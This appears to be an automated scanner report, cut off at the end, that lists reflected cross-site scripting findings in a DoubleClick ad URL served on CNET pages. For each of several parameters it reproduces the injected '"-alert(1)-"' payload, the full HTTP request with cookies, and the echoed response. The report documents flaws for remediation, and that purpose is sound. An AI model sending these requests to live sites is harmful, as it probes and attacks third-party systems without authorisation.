GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAXce2ce"-alert(1)-"9cfe988ae87&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque" ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1cb6"-alert(1)-"d5ee076476 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 7-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=a1cb6"-alert(1)-"d5ee076476&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 703d6"-alert(1)-"b48e245097a was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100703d6"-alert(1)-"b48e245097a&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/htt ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e695"-alert(1)-"df34e3faf88 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=8e695"-alert(1)-"df34e3faf88&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004 ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b99c1"-alert(1)-"37925af0b26 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328b99c1"-alert(1)-"37925af0b26&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011. ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e784"-alert(1)-"614b3ef8fb was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.2438e784"-alert(1)-"614b3ef8fb&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee2e"-alert(1)-"625b1fe02f was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F8204981ee2e"-alert(1)-"625b1fe02f&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/ ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4e31"-alert(1)-"b2055b50289 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... t/click%3Bh%3Dv8/3af6/17/166/%2a/w%3B240097948%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421e4e31"-alert(1)-"b2055b50289&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&co ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bed07"-alert(1)-"256a1270d98 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0%3B0%3B61926988%3B4307-300/250%3B41900699/41918486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3bed07"-alert(1)-"256a1270d98&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42f7"-alert(1)-"fff3f79dcc6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... leclick.net/click%3Bh%3Dv8/3af6/17/166/%2a/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpn ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d44"-alert(1)-"a0df08ac7bf was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/latest-news/?tag=hdr;snav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var d ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f109"-alert(1)-"d9fd11bfd28 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
